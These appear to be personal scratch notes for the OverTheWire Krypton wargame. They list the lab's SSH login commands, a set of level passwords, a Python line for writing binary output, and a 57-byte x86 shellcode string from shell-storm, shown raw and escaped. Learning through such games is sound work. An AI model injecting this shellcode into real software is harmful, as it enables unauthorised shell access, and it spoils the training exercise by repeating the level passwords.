https://overthewire.org/wargames

location
---------
ssh krypton1@krypton.labs.overthewire.org -p 2231
git clone ssh://krypton6@krypton.labs.overthewire.org:2231/tmp/tmp.xece2p75RB
Use this password to log in to krypton.labs.overthewire.org with username krypton1 using SSH on port 2231. You can find the files for other levels in /krypton/

passwords
---------
0: KRYPTONISGREAT
1: ROTTEN
2: CAESARISEASY
3: BRUTE
4: CLEARTEXT
5: RANDOM

robots.txt is a file like .gitignore but then for sites

// printing binary data in python3
import sys
sys.stdout.buffer.write(b"some binary data")

shellcode payload http://shell-storm.org/shellcode/files/shellcode-607.html
57 bytes
"\xeb\x11\x5e\x31\xc9\xb1\x21\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x6b\x0c\x59\x9a\x53\x67\x69\x2e\x71\x8a\xe2\x53\x6b\x69\x69\x30\x63\x62\x74\x69\x30\x63\x6a\x6f\x8a\xe4\x53\x52\x54\x8a\xe2\xce\x81"
"\\xeb\\x11\\x5e\\x31\\xc9\\xb1\\x21\\x80\\x6c\\x0e\\xff\\x01\\x80\\xe9\\x01\\x75\\xf6\\xeb\\x05\\xe8\\xea\\xff\\xff\\xff\\x6b\\x0c\\x59\\x9a\\x53\\x67\\x69\\x2e\\x71\\x8a\\xe2\\x53\\x6b\\x69\\x69\\x30\\x63\\x62\\x74\\x69\\x30\\x63\\x6a\\x6f\\x8a\\xe4\\x53\\x52\\x54\\x8a\\xe2\\xce\\x81"
